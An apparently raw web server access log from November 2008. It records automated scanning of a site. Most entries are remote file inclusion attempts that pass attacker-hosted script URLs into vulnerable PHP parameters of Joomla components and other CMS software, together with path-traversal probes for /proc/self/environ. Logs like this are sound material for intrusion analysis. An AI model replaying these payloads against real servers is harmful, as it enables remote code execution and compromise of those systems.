89.108.71.148 - - [03/Nov/2008:06:37:02 -0600] "GET /scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
64.18.162.8 - - [03/Nov/2008:06:37:08 -0600] "GET /logs/access_log.1206144000//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
64.18.162.8 - - [03/Nov/2008:06:37:09 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
64.18.162.8 - - [03/Nov/2008:06:37:09 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
195.239.48.166 - - [03/Nov/2008:06:37:20 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:37:21 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:37:21 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:37:22 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:37:22 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:06:37:23 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
193.53.23.32 - - [03/Nov/2008:06:38:05 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
89.108.71.148 - - [03/Nov/2008:06:39:06 -0600] "GET /logs/scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
89.108.71.148 - - [03/Nov/2008:06:39:06 -0600] "GET /scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
64.18.162.8 - - [03/Nov/2008:06:39:13 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
193.95.93.158 - - [03/Nov/2008:06:39:45 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
89.108.71.148 - - [03/Nov/2008:06:39:56 -0600] "GET /logs/scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
89.108.71.148 - - [03/Nov/2008:06:39:57 -0600] "GET /scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
89.108.71.148 - - [03/Nov/2008:06:40:01 -0600] "GET /logs/scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
89.108.71.148 - - [03/Nov/2008:06:40:01 -0600] "GET /scanhttp://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
62.87.154.41 - - [03/Nov/2008:06:43:05 -0600] "GET /logs/scanhttp://akbars.jw.lt/id/header.jpg? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
62.87.154.41 - - [03/Nov/2008:06:43:09 -0600] "GET /scanhttp://akbars.jw.lt/id/header.jpg? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
219.94.174.158 - - [03/Nov/2008:06:45:26 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://rubi4.100megsfree8.com/comp-id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
219.94.174.158 - - [03/Nov/2008:06:45:26 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://rubi4.100megsfree8.com/comp-id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
151.1.233.89 - - [03/Nov/2008:06:46:05 -0600] "GET /logs//?p=http://www.viponline.com.br/alb.txt? HTTP/1.1" 200 105506 "-""libwww-perl/5.805"
151.1.233.89 - - [03/Nov/2008:06:46:05 -0600] "GET //?p=http://www.viponline.com.br/alb.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
83.149.69.97 - - [03/Nov/2008:06:46:19 -0600] "GET /logs/access_log.1208217600//db.php?path_local=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:46:19 -0600] "GET //db.php?path_local=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:46:19 -0600] "GET /logs//db.php?path_local=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:46:26 -0600] "GET /logs/access_log.1208217600//db.php?path_local=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:46:26 -0600] "GET //db.php?path_local=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:46:26 -0600] "GET /logs//db.php?path_local=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:46:33 -0600] "GET /logs/access_log.1214438400//db.php?path_local=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:06:46:40 -0600] "GET /logs/access_log.1214438400//db.php?path_local=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
62.87.154.41 - - [03/Nov/2008:06:47:03 -0600] "GET /scanhttp://emprit.xtgem.com/id/readme.dat?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
62.87.154.41 - - [03/Nov/2008:06:47:03 -0600] "GET /logs/scanhttp://emprit.xtgem.com/id/readme.dat?? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.105.248.78 - - [03/Nov/2008:06:48:25 -0600] "GET /logs//core/includes.php?CMS_ROOT=http://www.the-big-5.de//components/com_galleria/osy2.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
200.105.248.78 - - [03/Nov/2008:06:48:25 -0600] "GET //core/includes.php?CMS_ROOT=http://www.the-big-5.de//components/com_galleria/osy2.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
200.105.248.78 - - [03/Nov/2008:06:48:28 -0600] "GET /logs//core/includes.php?CMS_ROOT=http://www.the-big-5.de//components/com_galleria/osy2.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
200.105.248.78 - - [03/Nov/2008:06:48:29 -0600] "GET //core/includes.php?CMS_ROOT=http://www.the-big-5.de//components/com_galleria/osy2.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
200.105.248.78 - - [03/Nov/2008:06:50:03 -0600] "GET //core/includes.php?CMS_ROOT=http://www.the-big-5.de//components/com_galleria/osy2.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
74.7.219.93 - - [03/Nov/2008:06:50:48 -0600] "GET /logs/access_log.1215302400//inc/formmail.inc.php?script_root=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
74.7.219.93 - - [03/Nov/2008:06:50:48 -0600] "GET //inc/formmail.inc.php?script_root=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
74.7.219.93 - - [03/Nov/2008:06:50:48 -0600] "GET /logs//inc/formmail.inc.php?script_root=http://pwr.jp//acc/r0x.gif?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
93.186.183.3 - - [03/Nov/2008:06:52:32 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:06:52:32 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:06:52:32 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:06:52:32 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:06:52:32 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
69.94.108.111 - - [03/Nov/2008:06:52:49 -0600] "GET /logs//com_rwcards%22http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
69.94.108.111 - - [03/Nov/2008:06:52:49 -0600] "GET /logs//com_rwcards%22http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
69.94.108.111 - - [03/Nov/2008:06:52:49 -0600] "GET //com_rwcards%22http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
69.94.108.111 - - [03/Nov/2008:06:52:49 -0600] "GET //com_rwcards%22http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
88.84.157.127 - - [03/Nov/2008:06:54:15 -0600] "GET /logs/home.php?action=http://clusty.com/search??? HTTP/1.1" 404 297 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:06:54:15 -0600] "GET /logs/home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 297 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:06:54:15 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:06:54:15 -0600] "GET /logs/home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:06:54:16 -0600] "GET /home.php?action=http://clusty.com/search??? HTTP/1.1" 404 292 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:06:54:16 -0600] "GET /home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 292 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:06:54:16 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:06:54:16 -0600] "GET /home.php?action=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""XXXXXX"
83.2.108.2 - - [03/Nov/2008:06:55:18 -0600] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
83.2.108.2 - - [03/Nov/2008:06:55:18 -0600] "GET //modules/TotalCalendar/about.php?inc_dir=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
66.235.124.29 - - [03/Nov/2008:06:55:38 -0600] "GET /tattoo/set3.htm HTTP/1.0" 200 2177 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.197.201.69 - - [03/Nov/2008:06:55:40 -0600] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:55:46 -0600] "GET //faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:06:55:46 -0600] "GET /logs//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
93.186.183.3 - - [03/Nov/2008:06:55:54 -0600] "GET /logs/access_log.1206144000//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:06:55:54 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
93.186.183.3 - - [03/Nov/2008:06:55:54 -0600] "GET /logs//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
66.197.201.69 - - [03/Nov/2008:06:56:23 -0600] "GET /logs/access_log.1208044800//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
93.186.183.3 - - [03/Nov/2008:06:57:46 -0600] "GET /logs/access_log.1215302400//joomla/index.php?option=com_restaurante&task=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
217.11.165.250 - - [03/Nov/2008:06:58:51 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
217.11.165.250 - - [03/Nov/2008:06:58:51 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 304 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
66.197.201.69 - - [03/Nov/2008:06:59:13 -0600] "GET /logs/access_log.1205366400%20//faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
190.3.91.46 - - [03/Nov/2008:06:59:23 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.61 (Macintosh; I; PPC)"
190.3.91.46 - - [03/Nov/2008:06:59:23 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 304 "-""Mozilla/4.61 (Macintosh; I; PPC)"
202.171.48.89 - - [03/Nov/2008:06:59:41 -0600] "GET /logs/access_log.1206230400//inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
202.171.48.89 - - [03/Nov/2008:06:59:41 -0600] "GET /logs/access_log.1206230400//inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
202.171.48.89 - - [03/Nov/2008:06:59:41 -0600] "GET //inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
202.171.48.89 - - [03/Nov/2008:06:59:41 -0600] "GET //inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
202.171.48.89 - - [03/Nov/2008:06:59:42 -0600] "GET /logs//inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
202.171.48.89 - - [03/Nov/2008:06:59:42 -0600] "GET /logs//inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
202.171.48.89 - - [03/Nov/2008:06:59:42 -0600] "GET /logs/access_log.1206230400//inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
202.171.48.89 - - [03/Nov/2008:06:59:43 -0600] "GET //inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
202.171.48.89 - - [03/Nov/2008:06:59:43 -0600] "GET /logs//inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
74.6.18.228 - - [03/Nov/2008:07:02:19 -0600] "GET /costume/thmb1.htm HTTP/1.0" 200 3799 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.139.167.49 - - [03/Nov/2008:07:03:16 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
207.139.167.49 - - [03/Nov/2008:07:03:16 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 304 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
202.171.48.89 - - [03/Nov/2008:07:07:48 -0600] "GET /logs//inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
202.171.48.89 - - [03/Nov/2008:07:07:49 -0600] "GET //inc/cmses/aedatingCMS2.php?dir[inc]=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
66.197.201.69 - - [03/Nov/2008:07:08:24 -0600] "GET /logs/access_log.1205366400//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:07:08:28 -0600] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:07:08:28 -0600] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:07:09:08 -0600] "GET /logs/access_log.1208044800//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
207.150.183.60 - - [03/Nov/2008:07:09:25 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:07:09:25 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:09:27 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:09:27 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.197.201.69 - - [03/Nov/2008:07:11:31 -0600] "GET /logs/access_log.1205366400%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 353 "-""libwww-perl/5.65"
207.139.167.49 - - [03/Nov/2008:07:11:31 -0600] "GET /logs/access_log.1214179200//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:11:31 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:11:31 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:12:10 -0600] "GET /logs/access_log.1214438400//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:12:10 -0600] "GET //htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:12:10 -0600] "GET /logs//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
207.139.167.49 - - [03/Nov/2008:07:12:14 -0600] "GET /logs/access_log.1214438400//htmltonuke.php?filnavn=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:28 -0600] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:29 -0600] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:29 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:30 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:30 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:31 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:33 -0600] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:33 -0600] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:34 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:34 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:35 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.239.48.166 - - [03/Nov/2008:07:12:35 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
94.23.0.147 - - [03/Nov/2008:07:14:30 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
94.23.0.147 - - [03/Nov/2008:07:14:30 -0600] "GET /logs/index.php?p=http://clusty.com/search??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
94.23.0.147 - - [03/Nov/2008:07:14:30 -0600] "GET /logs/index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:07:14:30 -0600] "GET /logs/index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:07:14:31 -0600] "GET /index.php?p=http://clusty.com/search??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
94.23.0.147 - - [03/Nov/2008:07:14:31 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
94.23.0.147 - - [03/Nov/2008:07:14:31 -0600] "GET /index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:07:14:31 -0600] "GET /index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""XXXXXX"
62.87.154.41 - - [03/Nov/2008:07:15:23 -0600] "GET ///vwar/backup/errors.php?error=http://akbars.jw.lt/id/header.jpg? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
64.106.143.80 - - [03/Nov/2008:07:18:14 -0600] "GET /logs/access_log.1214956800//admin/frontpage_right.php?loadadminpage=http://www.hexapharm.com/extranet/files/8/id.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
64.106.143.80 - - [03/Nov/2008:07:18:14 -0600] "GET //admin/frontpage_right.php?loadadminpage=http://www.hexapharm.com/extranet/files/8/id.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
